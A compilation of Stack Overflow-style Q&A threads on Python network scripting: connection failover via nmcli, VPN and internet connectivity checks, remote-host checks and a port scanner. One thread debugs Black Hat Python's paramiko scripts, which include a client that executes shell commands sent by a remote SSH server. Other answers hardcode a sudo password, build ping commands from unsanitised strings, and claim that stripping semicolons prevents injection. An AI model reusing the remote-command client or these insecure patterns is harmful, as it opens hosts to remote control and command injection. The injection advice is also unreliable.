How to switch Internet connections using Python in Ubuntu?

I have two internet connections via LAN Cable. I am from India, so they are not reliable. If one internet stops working, I want to automatically switch to another internet connection.
I wrote this script to check if the Internet is working or not:
import requests

try:
    request = requests.get("http://www.google.co.in", timeout=5)
except (requests.ConnectionError, requests.Timeout) as exception:
    try:
        request = requests.get("http://www.amazon.com", timeout=5)
    except (requests.ConnectionError, requests.Timeout) as exception:
        print("Internet not working, switching internet.....")
If neither Google nor Amazon responds, I need to switch the internet connection.
My connection names are "Wired connection 1" and "Wired connection 2".
Edit: If someone has a solution in any other language or using software, please let me know.

It is a bit tricky, because there can be different network connection management interfaces on Ubuntu.
One of the most popular is NetworkManager.
If your machine uses it, you can try getting and using NetworkManager python module.
It says that "You can use this interface to query NetworkManager about the overall state of the network and details of network devices like current IP addresses or DHCP options, and to configure, activate and deactivate network connections."
So it should work, provided your Ubuntu uses NetworkManager.
As I have never used it, I can't provide any technical details on how to set up connection switching.
If it turns out that the module doesn't work or your Ubuntu doesn't use NetworkManager, you can always switch connections from within Python by running whichever shell commands you would normally use, via os.system() calls or the subprocess module.
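For example, a minimal sketch of that approach using subprocess and nmcli (assuming NetworkManager is in use and the connection profiles are named as in the question; depending on polkit policy you may need elevated privileges):

import subprocess

def switch_connection(activate, deactivate):
    # nmcli refers to profiles by the names listed in `nmcli connection show`
    subprocess.run(["nmcli", "connection", "down", deactivate], check=False)
    subprocess.run(["nmcli", "connection", "up", activate], check=True)

# e.g. fail over from the first wired profile to the second
switch_connection("Wired connection 2", "Wired connection 1")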

I figured it out:
import requests
import os
import time

sudoPassword = 'pass'
pingFailStreak = 0
url1 = "http://www.google.co.in"
url2 = "http://www.amazon.com"
timeout = 5

def doesInternetWork(url, timeout):
    try:
        requests.get(url, timeout=timeout)
        return True
    except (requests.ConnectionError, requests.Timeout):
        return False

def connectInternet(netID):
    # Connection 1 uses interface enp5s0, connection 2 uses enp6s0
    if netID == 1:
        command = 'nmcli dev disconnect enp6s0'
        os.system('echo %s|sudo -S %s' % (sudoPassword, command))
        command = 'nmcli dev connect enp5s0'
        os.system('echo %s|sudo -S %s' % (sudoPassword, command))
    elif netID == 2:
        command = 'nmcli dev disconnect enp5s0'
        os.system('echo %s|sudo -S %s' % (sudoPassword, command))
        command = 'nmcli dev connect enp6s0'
        os.system('echo %s|sudo -S %s' % (sudoPassword, command))

while True:
    if not doesInternetWork(url1, timeout) and not doesInternetWork(url2, timeout):
        print("Internet not working")
        pingFailStreak += 1
        if pingFailStreak > 2:
            print("Switching internet to 1")
            connectInternet(1)
            time.sleep(5)
            if not doesInternetWork(url1, timeout) and not doesInternetWork(url2, timeout):
                print("Switching internet to 2")
                connectInternet(2)
                time.sleep(5)
    else:
        pingFailStreak = 0  # reset the failure counter once connectivity is back
    time.sleep(2)

Related

Checking internet connection before polling? (Telegram bot) [duplicate]


Python Scripts Run but don't do anything

Lately, I've developed an interest in penetration testing. I decided to try and learn how to write some scripts before investing in a full blown course. Currently I'm working my way through the book Black Hat Python by Justin Seitz.
I'm in the section on SSH using Paramiko and two of the scripts have me stumped. They both run without errors but nothing gets shown on screen. In Windows and Linux the terminal (or DOS prompt) just returns immediately to the prompt. I have gone over the scripts several times and can't find the issue. The code for both scripts is shown in full below.
Script #1 bh_sshserver.py (The purpose of this script is to create an ssh server)
import socket
import paramiko
import threading
import sys

class Server(paramiko.ServerInterface):
    def _init_(self):
        self.event = threading.Event()
    def check_channel_request(self, kind, chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
    def check_auth_password(self, username, password):
        if (username == 'root') and (password == '12345'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED

server = sys.argv[1]
ssh_port = sys.argv[2]

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((server, ssh_port))
    sock.listen(100)
    print '[+] Listening for connection...'
    client, addr = sock.accept()
except Exception, e:
    print ' [-] Listen Failed: ' + str(e)
    sys.exit(1)
print '[+] Got a connection'

try:
    bhSession = paramiko.Transport(client)
    bhSession.add_server_key(host_key)
    server = Server()
    try:
        bhSession.start_server(server=server)
    except paramiko.SSHException, x:
        print '[-] SSH Negotiation Failed'
    chan = bhSession.accept(20)
    print '[+] Authenticated!'
    print chan.recv(1024)
    chan.send('Welcome to bh_ssh')
    while True:
        try:
            command = raw_input("Enter command: ").strip('\n')
            if command != 'exit':
                chan.send(command)
                print chan.recv(1024) + '\n'
            else:
                chan.send('exit')
                print 'exiting'
                bhSession.close()
                raise Exception('exit')
        except KeyboardInterrupt:
            bhSession.close()
except Exception, e:
    print '[-] Caught exception: ' + str(e)
    try:
        bhSession.close()
    except:
        pass
    sys.exit(1)
Script #2 bh_sshRcmd.py (The purpose of this script is to create a command receiver for the ssh server to connect to)
import threading
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):
    client = paramiko.SSHClient()
    # client.load_host_keys('/home/root/.ssh/known_hosts')
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.exec_command(command)
        print ssh_session.recv(1024)
        # Read the banner
        while True:
            command = ssh_session.recv(1024)
            # Get command from the SSH server
            try:
                cmd_output = subprocess.check_output(command, shell=True)
                ssh_session.send(cmd_output)
            except Exception, e:
                ssh_session.send(str(e))
        client.close()
    return
    ssh_command('192.168.1.26', 'Admin', '12345', 'ClientConnected')
Both of these scripts were written on Windows and so do not need the shebang line (i.e. #!/usr/bin/python) at the top. I copied them over to a Linux VM, added that line, and made them executable using chmod +x. Still, nothing shows on screen when the scripts run. The IP addresses are from a VMware virtual network which has never given me problems before.
It is likely that there is an error connecting to your server. Try adding more print statements to cover the conditionals like so:
import threading
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):
    print 'running ssh_command with ip: {ip} user: {user} passwd: {passwd}, command: {command}'.format(ip=ip, user=user, passwd=passwd, command=command)
    client = paramiko.SSHClient()
    # client.load_host_keys('/home/root/.ssh/known_hosts')
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        print 'ssh_session is active'
        ssh_session.exec_command(command)
        print ssh_session.recv(1024)
        # Read the banner
        while True:
            print 'recv-ing'
            command = ssh_session.recv(1024)
            # Get command from the SSH server
            try:
                cmd_output = subprocess.check_output(command, shell=True)
                ssh_session.send(cmd_output)
            except Exception, e:
                ssh_session.send(str(e))
        client.close()
        return
    else:
        print 'ssh_session is not active'

ssh_command('192.168.1.26', 'Admin', '12345', 'ClientConnected')
As for bh_sshserver.py, if you ran python bh_sshserver.py, nothing would happen. This is because you don't have any statements in the main scope. If you wanted to start the server you could add code to the bottom of the script with no indentation.
You should call your server from the terminal using command-line arguments, like this:
python scriptname.py server_address port
Change the indentation on the last line of the client script - it should call your function.
The server addresses in the terminal and in the client function should be the same.
That's pretty much all.
I can provide you with these two scripts that are working for me, if you need them.
Thanks to everyone who replied. In the end I found some Paramiko demo files on GitHub that included a sample SSH server. It turns out the script is much more complicated than the author makes it out to be. I was missing a ton of code, which is why the server was not working. As soon as I made my script roughly match the sample, it worked perfectly, and so did my client.
In case anyone comes across a similar problem, here is the link to the Paramiko demo files:
https://github.com/paramiko/paramiko/tree/master/demos

Continuous check for VPN Connectivity - Python

Is there any efficient way to check and report, in a log file or maybe on the console, whenever the VPN is disconnected?
import time
print time.asctime( time.localtime(time.time()) )
This can print the time, but I do not know how to repeatedly find out whether the VPN is active or not. Pinging it in a while(1) loop seems like a crude way to check whether the connection is active. Is there a better way to achieve this?
This solution is system dependent. I do know that it works on Linux because I've done something similar, but I'm not sure about Windows. I don't know if you want a solution not involving ping, but I think this is a good one.
import logging, os, time

PING_HOST = '10.10.10.10'  # some host on the other side of the VPN

while True:
    retcode = os.system('ping -c 1 %s' % PING_HOST)
    if retcode:
        # perform action for lost connection
        logging.warn('Lost visibility with %s' % PING_HOST)
    time.sleep(10)  # sleep 10 seconds
This works because ping returns a return code of 0 for success. All other return codes signify an error.
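If you would rather not have ping's output spill onto the console, here is a sketch of the same idea with subprocess on Python 3 (same placeholder host as above; discarding stdout/stderr is the only real difference):

import logging
import subprocess
import time

PING_HOST = '10.10.10.10'  # some host on the other side of the VPN

while True:
    # -c 1 sends a single echo request; a return code of 0 means a reply came back
    result = subprocess.run(['ping', '-c', '1', PING_HOST],
                            stdout=subprocess.DEVNULL,
                            stderr=subprocess.DEVNULL)
    if result.returncode != 0:
        logging.warning('Lost visibility with %s', PING_HOST)
    time.sleep(10)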
In case the IP of the VPN changes, you can check whether a tunnel has been established at all.
import psutil
import logging, os, time
import subprocess
import sys

procname = "yourprocess_name"

while True:
    cmdout = subprocess.Popen(["ifconfig | grep tun"], stdout=subprocess.PIPE, shell=True).communicate()[0]
    print "cmdout: " + str(cmdout)
    time.sleep(2)
    #-----
    if "tun" in cmdout:
        print "seems to be ok"
    if not "tun" in cmdout:
        # perform action for lost connection
        print "killing " + str(procname)
        for proc in psutil.process_iter():
            # check whether the process name matches
            print "Listing procname: " + str(proc.name())
            if proc.name() == procname:
                proc.kill()
        sys.exit()
This method uses the name of the host found under "Connection-specific DNS Suffix" associated with your IP (usually the corporation's VPN):
import os
import platform

def check_ping():
    hostname = "xyz.com"  # hostname will be the name under "Connection-specific DNS Suffix" when you type "ipconfig" in cmd
    response = os.system("ping " + ("-n 1 " if platform.system().lower() == "windows" else "-c 1 ") + hostname)
    # and then check the response...
    if response == 0:
        pingstatus = "Network Active: Connected"
    else:
        pingstatus = "Network Error: Not Connected"
    return pingstatus

response = check_ping()
print(response)
response = check_ping()
print(response)

How can I see if there's an available and active network connection in Python?

I want to see if I can access an online API, but for that, I need to have Internet access.
How can I see if there's a connection available and active using Python?
Perhaps you could use something like this:
import urllib2

def internet_on():
    try:
        urllib2.urlopen('http://216.58.192.142', timeout=1)
        return True
    except urllib2.URLError as err:
        return False
Currently, 216.58.192.142 is one of the IP addresses for google.com. Change http://216.58.192.142 to whatever site can be expected to respond quickly.
This fixed IP will not map to google.com forever. So this code is
not robust -- it will need constant maintenance to keep it working.
The reason the code above uses a fixed IP address instead of a fully qualified domain name (FQDN) is that an FQDN would require a DNS lookup. When the machine does not have a working internet connection, the DNS lookup itself may block the call to urlopen for more than a second. Thanks to @rzetterberg for pointing this out.
If the fixed IP address above is not working, you can find a current IP address for google.com (on unix) by running
% dig google.com +trace
...
google.com. 300 IN A 216.58.192.142
If we can connect to some Internet server, then we indeed have connectivity. However, for the fastest and most reliable approach, all solutions should comply with the following requirements, at the very least:
Avoid DNS resolution (we will need an IP that is well-known and guaranteed to be available for most of the time)
Avoid application layer connections (connecting to an HTTP/FTP/IMAP service)
Avoid calls to external utilities from Python or other language of choice (we need to come up with a language-agnostic solution that doesn't rely on third-party solutions)
To comply with these, one approach could be to check whether one of Google's public DNS servers is reachable. The IPv4 addresses for these servers are 8.8.8.8 and 8.8.4.4. We can try connecting to either of them.
A quick Nmap scan of the host 8.8.8.8 gave the result below:
$ sudo nmap 8.8.8.8
Starting Nmap 6.40 ( http://nmap.org ) at 2015-10-14 10:17 IST
Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.0048s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
53/tcp open domain
Nmap done: 1 IP address (1 host up) scanned in 23.81 seconds
As we can see, 53/tcp is open and non-filtered. If you are a non-root user, remember to use sudo or the -Pn argument for Nmap to send crafted probe packets and determine if a host is up.
Before we try with Python, let's test connectivity using an external tool, Netcat:
$ nc 8.8.8.8 53 -zv
Connection to 8.8.8.8 53 port [tcp/domain] succeeded!
Netcat confirms that we can reach 8.8.8.8 over 53/tcp. Now we can set up a socket connection to 8.8.8.8:53/tcp in Python to check connection:
import socket

def internet(host="8.8.8.8", port=53, timeout=3):
    """
    Host: 8.8.8.8 (google-public-dns-a.google.com)
    OpenPort: 53/tcp
    Service: domain (DNS/TCP)
    """
    try:
        socket.setdefaulttimeout(timeout)
        socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))
        return True
    except socket.error as ex:
        print(ex)
        return False

internet()
Another approach could be to send a manually crafted DNS probe to one of these servers and wait for a response. But, I assume, it might prove slower in comparison due to packet drops, DNS resolution failure, etc. Please comment if you think otherwise.
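For completeness, here is a rough sketch of that DNS-probe idea (a hand-built query for an A record, sent over UDP to 8.8.8.8; offered only as an illustration of the approach, not a benchmarked alternative):

import socket
import struct

def dns_probe(server="8.8.8.8", port=53, timeout=3):
    # Minimal DNS query: header (ID=0x1234, flags=RD, QDCOUNT=1) plus one question for google.com A/IN
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    question = b"\x06google\x03com\x00" + struct.pack("!HH", 1, 1)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(header + question, (server, port))
        data, _ = sock.recvfrom(512)
        # Any response echoing our transaction ID counts as "the internet is up"
        return data[:2] == b"\x12\x34"
    except socket.error:
        return False
    finally:
        sock.close()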
UPDATE #4: This listing of public nameservers is a good reference for IPs to test against.
UPDATE #3: Tested again after the exception handling change:
defos.py
True
00:00:00:00.410
iamaziz.py
True
00:00:00:00.240
ivelin.py
True
00:00:00:00.109
jaredb.py
True
00:00:00:00.520
kevinc.py
True
00:00:00:00.317
unutbu.py
True
00:00:00:00.436
7h3rAm.py
True
00:00:00:00.030
UPDATE #2: I did quick tests to identify the fastest and most generic implementation of all valid answers to this question. Here's the summary:
$ ls *.py | sort -n | xargs -I % sh -c 'echo %; ./timeit.sh %; echo'
defos.py
True
00:00:00:00.487
iamaziz.py
True
00:00:00:00.335
ivelin.py
True
00:00:00:00.105
jaredb.py
True
00:00:00:00.533
kevinc.py
True
00:00:00:00.295
unutbu.py
True
00:00:00:00.546
7h3rAm.py
True
00:00:00:00.032
And once more:
$ ls *.py | sort -n | xargs -I % sh -c 'echo %; ./timeit.sh %; echo'
defos.py
True
00:00:00:00.450
iamaziz.py
True
00:00:00:00.358
ivelin.py
True
00:00:00:00.099
jaredb.py
True
00:00:00:00.585
kevinc.py
True
00:00:00:00.492
unutbu.py
True
00:00:00:00.485
7h3rAm.py
True
00:00:00:00.035
True in the above output signifies that all these implementations from respective authors correctly identify connectivity to the Internet. Time is shown with milliseconds resolution.
UPDATE #1: Thanks to @theamk's comment, timeout is now an argument and initialized to 3 s by default.
It will be faster to just make a HEAD request so no HTML will be fetched.
try:
    import httplib  # python < 3.0
except ImportError:
    import http.client as httplib

def have_internet() -> bool:
    conn = httplib.HTTPSConnection("8.8.8.8", timeout=5)
    try:
        conn.request("HEAD", "/")
        return True
    except Exception:
        return False
    finally:
        conn.close()
As an alternative to unutbu's/Kevin C's answers, I use the requests package like this:
import requests

def connected_to_internet(url='http://www.google.com/', timeout=5):
    try:
        _ = requests.head(url, timeout=timeout)
        return True
    except requests.ConnectionError:
        print("No internet connection available.")
        return False
Bonus: this can be extended into a function that checks whether a particular website is up.
def web_site_online(url='http://www.google.com/', timeout=5):
    try:
        req = requests.head(url, timeout=timeout)
        # HTTP errors are not raised by default, this statement does that
        req.raise_for_status()
        return True
    except requests.HTTPError as e:
        print("Checking internet connection failed, status code {0}.".format(
            e.response.status_code))
    except requests.ConnectionError:
        print("No internet connection available.")
    return False
Just to update what unutbu said, for new code in Python 3.2:
import urllib.request

def check_connectivity(reference):
    try:
        urllib.request.urlopen(reference, timeout=1)
        return True
    except urllib.request.URLError:
        return False
And, just to note, the input here (reference) is the url that you want to check: I suggest choosing something that connects fast where you live -- i.e. I live in South Korea, so I would probably set reference to http://www.naver.com.
You can just try to download data, and if the connection fails you will know that something with the connection isn't fine.
Basically, you can't really check whether the computer is connected to the internet. There can be many reasons for failure, like wrong DNS configuration, firewalls, NAT. So even if you make some tests, you can't have a guarantee that you will have a connection to your API until you try.
import urllib

def connected(host='http://google.com'):
    try:
        urllib.urlopen(host)
        return True
    except:
        return False

# test
print('connected' if connected() else 'no internet!')
For python 3, use urllib.request.urlopen(host)
Try the operation you were attempting to do anyway. If it fails, Python should throw an exception to let you know.
Trying some trivial operation first to detect a connection introduces a race condition: what if the internet connection is valid when you test, but goes down before you need to do the actual work?
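A minimal sketch of that approach, assuming the real work is a call to a hypothetical HTTP API made with requests (the URL is just a placeholder):

import requests

API_URL = "https://api.example.com/data"  # hypothetical endpoint standing in for the real API

def fetch_data():
    try:
        response = requests.get(API_URL, timeout=5)
        response.raise_for_status()
        return response.json()
    except requests.RequestException as exc:
        # Covers DNS failures, refused connections, timeouts and HTTP errors alike
        print("Could not reach the API:", exc)
        return None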
Here's my version
import requests

try:
    if requests.get('https://google.com').ok:
        print("You're Online")
except requests.RequestException:
    print("You're Offline")
This might not work if the localhost has been changed from 127.0.0.1
Try
import socket

ipaddress = socket.gethostbyname(socket.gethostname())
if ipaddress == "127.0.0.1":
    print("You are not connected to the internet!")
else:
    print("You are connected to the internet with the IP address of " + ipaddress)
Unless edited, your computer's IP will be 127.0.0.1 when not connected to the internet.
This code basically gets the IP address and then asks if it is the localhost IP address.
Hope that helps
A modern portable solution with requests:
import requests

def internet():
    """Detect an internet connection."""
    connection = None
    try:
        r = requests.get("https://google.com")
        r.raise_for_status()
        print("Internet connection detected.")
        connection = True
    except:
        print("Internet connection not detected.")
        connection = False
    finally:
        return connection
Or, a version that raises an exception:
import requests
from requests.exceptions import ConnectionError

def internet():
    """Detect an internet connection."""
    try:
        r = requests.get("https://google.com")
        r.raise_for_status()
        print("Internet connection detected.")
    except ConnectionError as e:
        print("Internet connection not detected.")
        raise e
The best way to do this is to check against the IP address that Python returns when it can't find the website. In this case, this is my code:
import socket

print("website connection checker")
while True:
    website = input("please input website: ")
    print("")
    print(socket.gethostbyname(website))
    if socket.gethostbyname(website) == "92.242.140.2":
        print("Website could be experiencing an issue/Doesn't exist")
    else:
        print("Website is operational!")
        print("")
My favorite one, for when running scripts on a cluster or not:
import subprocess

def online(timeout):
    try:
        return subprocess.run(
            ['wget', '-q', '--spider', 'google.com'],
            timeout=timeout
        ).returncode == 0
    except subprocess.TimeoutExpired:
        return False
This runs wget quietly, not downloading anything but checking that the given remote file exists on the web.
Taking unutbu's answer as a starting point, and having been burned in the past by a "static" IP address changing, I've made a simple class that checks once using a DNS lookup (i.e., using the URL "https://www.google.com"), and then stores the IP address of the responding server for use on subsequent checks. That way, the IP address is always up to date (assuming the class is re-initialized at least once every few years or so). I also give credit to gawry for this answer, which showed me how to get the server's IP address (after any redirection, etc.). Please disregard the apparent hackiness of this solution, I'm going for a minimal working example here. :)
Here is what I have:
import socket

try:
    from urllib2 import urlopen, URLError
    from urlparse import urlparse
except ImportError:  # Python 3
    from urllib.parse import urlparse
    from urllib.request import urlopen, URLError

class InternetChecker(object):
    conn_url = 'https://www.google.com/'

    def __init__(self):
        pass

    def test_internet(self):
        try:
            data = urlopen(self.conn_url, timeout=5)
        except URLError:
            return False
        try:
            host = data.fp._sock.fp._sock.getpeername()
        except AttributeError:  # Python 3
            host = data.fp.raw._sock.getpeername()
        # Ensure conn_url is an IPv4 address otherwise future queries will fail
        self.conn_url = 'http://' + (host[0] if len(host) == 2 else
                                     socket.gethostbyname(urlparse(data.geturl()).hostname))
        return True

# Usage example
checker = InternetChecker()
checker.test_internet()
Taking Six's answer, I think we could simplify it somewhat, which matters because newcomers get lost in highly technical answers.
Here is what I finally use to wait for my connection (3G, slow) to be established once a day, for my PV monitoring.
It works under Python 3.4.2 on Raspbian:
from urllib.request import urlopen
from time import sleep

urltotest = 'http://www.lsdx.eu'  # my own web page
nboftrials = 0
answer = 'NO'
while answer == 'NO' and nboftrials < 10:
    try:
        urlopen(urltotest)
        answer = 'YES'
    except:
        essai = 'NO'  # answer stays 'NO', so the loop retries
        nboftrials += 1
        sleep(30)
Maximum running time: 5 minutes. If that is reached, I will try again in one hour's time, but that's another bit of script!
Taking Ivelin's answer, I added some extra checks, as my router delivers its own IP address 192.168.0.1 and answers the HEAD request when querying google.com even if it has no internet connection.
import socket
try:
    import httplib  # python < 3.0
except ImportError:
    import http.client as httplib

def haveInternet():
    try:
        # first check if we get the correct IP-Address or just the router's IP-Address
        info = socket.getaddrinfo("www.google.com", None)[0]
        ipAddr = info[4][0]
        if ipAddr == "192.168.0.1":
            return False
    except:
        return False

    conn = httplib.HTTPConnection("www.google.com", timeout=5)
    try:
        conn.request("HEAD", "/")
        conn.close()
        return True
    except:
        conn.close()
        return False
This works for me in Python 3.6:
import urllib
from urllib.request import urlopen

def is_internet():
    """
    Query internet using python
    :return:
    """
    try:
        urlopen('https://www.google.com', timeout=1)
        return True
    except urllib.error.URLError as Error:
        print(Error)
        return False

if is_internet():
    print("Internet is active")
else:
    print("Internet disconnected")
I added a few things to Joel's code.
import socket, time

mem1 = 0
while True:
    try:
        host = socket.gethostbyname("www.google.com")  # Change to personal choice of site
        s = socket.create_connection((host, 80), 2)
        s.close()
        mem2 = 1
        if (mem2 == mem1):
            pass  # Add commands to be executed on every check
        else:
            mem1 = mem2
            print("Internet is working")  # Will be executed on state change
    except Exception as e:
        mem2 = 0
        if (mem2 == mem1):
            pass
        else:
            mem1 = mem2
            print("Internet is down")
    time.sleep(10)  # timeInterval for checking
For my projects I use a script modified to ping the Google public DNS server 8.8.8.8, using a timeout of 1 second and core Python libraries with no external dependencies:
import struct
import socket
import select

def send_one_ping(to='8.8.8.8'):
    # Raw ICMP sockets normally require root privileges
    ping_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname('icmp'))
    checksum = 49410  # pre-computed checksum for this fixed header + payload
    data = b'BCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwx'
    header = struct.pack(
        '!BBHHH', 8, 0, checksum, 0x123, 1
    )
    packet = header + data
    ping_socket.sendto(packet, (to, 1))
    inputready, _, _ = select.select([ping_socket], [], [], 1.0)
    if inputready == []:
        raise Exception('No internet')  ## or return False
    _, address = ping_socket.recvfrom(2048)
    print(address)  ## or return True

send_one_ping()
The select timeout value is 1, but can be a floating point number of choice to fail more readily than the 1 second in this example.
Make sure your pip is up to date by running
pip install --upgrade pip
Install the requests package using
pip install requests
import requests
import webbrowser

url = "http://www.youtube.com"
timeout = 6
try:
    request = requests.get(url, timeout=timeout)
    print("Connected to the Internet")
    print("browser is loading url")
    webbrowser.open(url)
except (requests.ConnectionError, requests.Timeout) as exception:
    print("poor or no internet connection.")
Import requests and try this simple Python code:
def check_internet():
    url = 'http://www.google.com/'
    timeout = 5
    try:
        _ = requests.get(url, timeout=timeout)
        return True
    except requests.ConnectionError:
        return False
I just want to refer to Ivelin's solution, because I can't comment there.
In python 2.7 with an old SSL certificate (in my case, not possible to update, which is another story), there is a possibility of a Certificate Error. In that case, replacing '8.8.8.8' with 'dns.google' or '8888.google' can help.
Hope this helps someone too.
try:
    import httplib  # python < 3.0
except ImportError:
    import http.client as httplib

def have_internet():
    conn = httplib.HTTPSConnection("8888.google", timeout=5)
    try:
        conn.request("HEAD", "/")
        return True
    except Exception:
        return False
    finally:
        conn.close()

Check if remote host is up in Python

How would I check whether a remote host is up without having a port number? Is there any other way I could check, other than using a regular ping?
There is a possibility that the remote host might drop ping packets.
This worked fine for me:
HOST_UP = True if os.system("ping -c 1 " + SOMEHOST) is 0 else False
A protocol-level PING is best, i.e., connecting to the server and interacting with it in a way that doesn't do real work. That's because it is the only real way to be sure that the service is up. An ICMP ECHO (a.k.a. ping) would only tell you that the other end's network interface is up, and even then might be blocked; FWIW, I have seen machines where all user processes were bricked but which could still be pinged. In these days of application servers, even getting a network connection might not be enough; what if the hosted app is down or otherwise non-functional? As I said, talking sweet-nothings to the actual service that you are interested in is the best, surest approach.
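As an illustration, here is a sketch of such a protocol-level check for an HTTP service on Python 3 (swap in whatever protocol your service actually speaks):

import http.client

def http_service_up(host, port=80, timeout=5):
    """Issue a trivial HEAD request; any well-formed HTTP response means the service answered."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", "/")
        resp = conn.getresponse()
        # Even a 4xx/5xx status proves the HTTP service is alive; a dead host raises instead
        return resp.status is not None
    except (OSError, http.client.HTTPException):
        return False
    finally:
        conn.close()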
HOST_UP = True if os.system("ping -c 5 " + SOMEHOST.strip(";")) is 0 else False
to remove nasty script execution just add .strip(";")
-c 5
to increase the number of ping requests, if all pass than True
PS. Works only on Linux, on Windows always returns True
The best you can do is:
Try to connect on a known port (e.g. port 80 or 443 for HTTP or HTTPS); or
Ping the site. See Ping a site in Python?
Many sites block ICMP (the protocol used to ping sites), so you must know beforehand whether the host in question has it enabled or not.
Connecting to a port tells you mixed information. It really depends on what you want to know. A port might be open but the site is effectively hung so you may get a false positive. A more stringent approach might involve using a HTTP library to execute a Web request against a site and see if you get back a response.
It really all depends on what you need to know.
Many firewalls are configured to drop ping packets without responding. In addition, some network adapters will respond to ICMP ping requests without input from the operating system network stack, which means the operating system might be down, but the host still responds to pings (usually you'll notice if you reboot the server, say, it'll start responding to pings some time before the OS actually comes up and other services start up).
The only way to be certain that a host is up is to actually try to connect to it via some well-known port (e.g. web server port 80).
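A small sketch of that TCP connect check (Python 3; port 80 is just the example port from the text):

import socket

def host_up(host, port=80, timeout=3):
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

print(host_up("www.google.com"))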
Why do you need to know if the host is "up"? Maybe there's a better way to do it.
What about trying something that requires an RPC, like a 'tasklist' command, in conjunction with a ping?
I would use a port scanner. The original question states that you don't want to use a port, but then you need to specify which protocol (yes, this needs a port) you want to monitor: HTTP, VNC, SSH, etc. In case you want to monitor via ICMP, you can use subprocess and control the ping parameters: number of pings, timeout, size, etc.
import subprocess

def connectivity():
    try:
        res = subprocess.Popen(['ping -t2 -c 4 110.10.0.254 &> /dev/null; echo $?'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = res.communicate()
        out = out.rstrip()
        err = err.rstrip()
        print 'general.connectivity() Out: ' + out
        print 'general.connectivity() Err: ' + err
        if out == "0":
            print 'general.connectivity() Successful'
            return True
        print 'general.connectivity() Failed'
        return False
    except Exception, e:
        print 'general.connectivity() Exception'
        return False
In case you want a port scanner:
import socket
from functools import partial
from multiprocessing import Pool
from multiprocessing.pool import ThreadPool
from errno import ECONNREFUSED

NUM_CORES = 4

def portscan(target, port):
    try:
        # Create Socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socketTimeout = 5
        s.settimeout(socketTimeout)
        s.connect((target, port))
        print('port_scanner.is_port_opened() ' + str(port) + " is opened")
        return port
    except socket.error as err:
        if err.errno == ECONNREFUSED:
            return False

# Wrapper function that calls portscan
def scan_ports(server=None, port=None, portStart=None, portEnd=None, **kwargs):
    p = Pool(NUM_CORES)
    ping_host = partial(portscan, server)
    if portStart and portEnd:
        return filter(bool, p.map(ping_host, range(portStart, portEnd)))
    else:
        return filter(bool, p.map(ping_host, range(port, port + 1)))

# Check if port is opened
def is_port_opened(server=None, port=None, **kwargs):
    print('port_scanner.is_port_opened() Checking port...')
    try:
        # Add more processes in case we look in a range
        pool = ThreadPool(processes=1)
        try:
            ports = list(scan_ports(server=server, port=int(port)))
            print("port_scanner.is_port_opened() Port scanner done.")
            if len(ports) != 0:
                print('port_scanner.is_port_opened() ' + str(len(ports)) + " port(s) available.")
                return True
            else:
                print('port_scanner.is_port_opened() port not opened: (' + port + ')')
                return False
        except Exception, e:
            raise
    except Exception, e:
        print e
        raise
